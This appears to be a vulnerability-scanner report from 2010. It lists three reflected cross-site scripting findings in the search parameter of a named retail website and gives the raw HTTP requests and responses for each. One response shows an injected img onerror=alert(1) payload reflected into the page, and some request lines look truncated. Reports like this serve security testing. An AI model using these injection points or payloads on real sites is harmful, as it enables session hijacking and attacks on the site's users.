1. Cross-site scripting (reflected)
1.1. http://www.staples.com/office/supplies/StaplesSearch [searchkey parameter]
1.2. http://www.staples.com/office/supplies/StaplesSearch [searchkey parameter]
1.3. http://www.staples.com/office/supplies/StaplesSearch [searchkey parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.staples.com |
Path: | /office/supplies |
GET /office/supplies Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.staples.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.staples.com Proxy-Connection: Keep-Alive Cookie: SSID=iReJVT05Hm3T0em4YF0F |
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html;charset=ISO Content-Language: en-US RTSS: 1 Date: Tue, 16 Nov 2010 18:13:33 GMT Connection: close Vary: Accept-Encoding Set-Cookie: sslb=B; path=/; domain=.staples.com Set-Cookie: WC_USERSESSION_565679582 ZipCodeDebug: Cookie=present_value ZipCodeCookie: 75201 Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate Expires: Wed, 16 Dec 2009 18:36:02 GMT Pragma: no-cache Content-Length: 213355 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.staples.com |
Path: | /office/supplies |
GET /office/supplies Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.staples.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.staples.com Proxy-Connection: Keep-Alive Cookie: SSID=iReJVT05Hm3T0em4YF0F |
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html;charset=ISO Content-Language: en-US RTSS: 1 Date: Tue, 16 Nov 2010 18:13:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: sslb=B; path=/; domain=.staples.com Set-Cookie: WC_USERSESSION_-1002=DEL Set-Cookie: WC_USERSESSION_565679679 ZipCodeDebug: Cookie=present_value ZipCodeCookie: 75201 Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate Expires: Wed, 16 Dec 2009 18:36:02 GMT Pragma: no-cache Content-Length: 38386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="text" id="searchbox2" name="searchkey" class="text4" value="||b443f"><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.staples.com |
Path: | /office/supplies |
GET /office/supplies Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.staples.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.staples.com Proxy-Connection: Keep-Alive Cookie: SSID=iReJVT05Hm3T0em4YF0F |
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html;charset=ISO Content-Language: en-US RTSS: 1 Date: Tue, 16 Nov 2010 18:13:41 GMT Connection: close Vary: Accept-Encoding Set-Cookie: sslb=B; path=/; domain=.staples.com Set-Cookie: WC_USERSESSION_565679582 ZipCodeDebug: Cookie=present_value ZipCodeCookie: 75201 Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate Expires: Wed, 16 Dec 2009 18:36:02 GMT Pragma: no-cache Content-Length: 198992 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <script type="text/javascript"> loadPersonalized('/office </script> ...[SNIP]... |